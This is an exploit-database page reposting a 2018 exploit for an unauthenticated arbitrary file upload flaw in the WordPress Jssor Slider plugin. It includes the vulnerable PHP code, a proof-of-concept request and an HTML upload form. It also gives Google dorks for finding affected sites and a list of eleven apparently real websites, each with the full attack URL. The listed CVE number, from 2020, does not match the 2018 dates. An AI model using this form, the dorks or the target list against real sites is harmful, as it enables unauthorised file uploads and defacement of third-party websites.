Advertisement






WordPress DrcSystems EthicSolutions Jssor-Slider Library Plugin Arbitrary File Upload Vulnerability

CVE Category Price Severity
CVE-2020-25206 CWE-284 Not disclosed High
Author Risk Exploitation Type Date
Mehmet EMIROGLU High Remote 2018-06-21
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018060226

Below is a copy:

WordPress DrcSystems EthicSolutions Jssor-Slider Library Plugin Arbitrary File Upload Vulnerability
#################################################################################################

# Exploit Title : WordPress DrcSystems EthicSolutions Jssor-Slider Library Plugin Arbitrary File Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army 
# Date : 19/06/2018
# Vendor Homepage : jssor.com - drcsystems.com - ethicsolutions.com - wordpress.org/plugins/jssor-slider/
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-284 [ Improper Access Control ] -  CWE-862  [ Missing Authorization ]

#####################################################################################################

Description : Jssor Slider by jssor.com is open source software.

Jssor Slider is professional, light weight and easy to use slideshow/slider/gallery/carousel/banner, it is optimized for mobile device with tons of unique features.

# Key Features :

Touch Swipe - 200+ Slideshow Transitions - Layer Animation - Fast Loading, load slider html code from disk cache directly - High Performance
Light Weight - Easy to Use -  Repeated Layer Animation - Image Layer - Text/Html Layer - Panel Layer - Nested Layer - Layer Blending - Clip Mask
Multiplex Transition - z-index Animation - Timeline Break - Dozens of bullet/arrow/thumbnail skins

#####################################################################################################

Affected Jssor Slider Plugin Code :

When the plugin is active the function register_ajax_calls() in the file /lib/jssor-slider-class.php is run:

That gives anyone access to two AJAX functions that are only intended to be accessible to those logged in as Administrators. 
The upload_library() function accessible through that handles uploading a file through /lib/upload.php. 
That file also doesnt do any checks as to who is making the request and does not restrict what type of files can be uploaded.
It is also possible to exploit this by sending a request directly to the file /lib/upload.php, as long as the undefined constant in that isnt treated as an error.
The following proof of concept will upload the selected file to the directory /wp-content/jssor-slider/jssor-uploads/.
Make sure to replace [path to WordPress] with the location of WordPress.

public function register_ajax_calls() {
 
if ( isset( $_REQUEST['action'] ) ) {
switch ( $_REQUEST['action'] ) {
case 'add_new_slider_library' :
add_action( 'admin_init', 'jssor_slider_library' );
function jssor_slider_library() {
 
include_once JSSOR_SLIDER_PATH . '/lib/add-new-slider-class.php';
}
break;
case 'upload_library' :
add_action( 'admin_init', 'upload_library' );
function upload_library() {
 
include_once JSSOR_SLIDER_PATH . '/lib/upload.php';
}
break;
}
}
}

#####################################################################################################

# Google Dorks :

inurl:''/wp-content/jssor-slider/jssor-uploads/''

intext:''Managed by Web development company Ethic Solutions''

intext:''Todos los derechos reservados  Ecuaauto - Distribuidor autorizado Chevrolet Ecuador''

intext:''Website Developed by DRC Systems''

#####################################################################################################

# PoC : /wp-admin/admin-ajax.php?param=upload_slide&action=upload_library

# Error : {"jsonrpc" : "2.0", "result" : null, "id" : "id"}

# Exploit Code : 

<html>
<body>
<form action="http://[PATH]/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library" method="POST" enctype="multipart/form-data" >
<input type="file" name="file" />
<input type="submit" value="Submit" />
</form>
</body>
</html

# Uploaded File Path :

/wp-content/jssor-slider/jssor-uploads/.....

# Allowed File Extensions : With the exception of php and asp. [ Not Allowed ] But other files extensions are allowed. For example html and txt and etcetra....

# Usage : Use with XAMPP Control Panel and with your Localhost [ 127.0.0.1]

localhost/jssorsliderexploiter.html

#################################################################################################

# Example All Sites =>  

treeline.co/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library
sss2003.org/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library
lr-parts.com.ua/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library
eduardobermejo.com/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library
anro.net.pl/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library
esplural.com/ecuaauto/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library
sardardham.org/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library
butterbean.ph/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library
canoes.fr/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library
betterimpact.ca/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library
klshospital.co.in/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library

############################################################################

Reference [ Me ] : cyberizm.org/cyberizm-wordpress-drcsystems-ethicsolutions-jssorslider-exploit.html

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.